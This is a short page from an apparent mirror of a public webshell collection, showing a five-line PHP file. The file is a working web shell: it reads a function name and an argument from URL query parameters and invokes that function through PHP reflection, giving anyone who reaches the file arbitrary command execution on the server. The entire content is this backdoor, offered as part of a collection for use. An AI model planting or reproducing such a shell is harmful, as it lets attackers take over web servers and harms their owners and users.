mirror of
https://github.com/tennc/webshell.git
synced 2025-12-07 21:31:29 +00:00
5 lines
100 B
Plaintext
5 lines
100 B
Plaintext
|
|
<?php
|
|
$func = new ReflectionFunction($_GET[m]);
|
|
echo $func->invokeArgs(array($_GET[c]));
|
|
?> |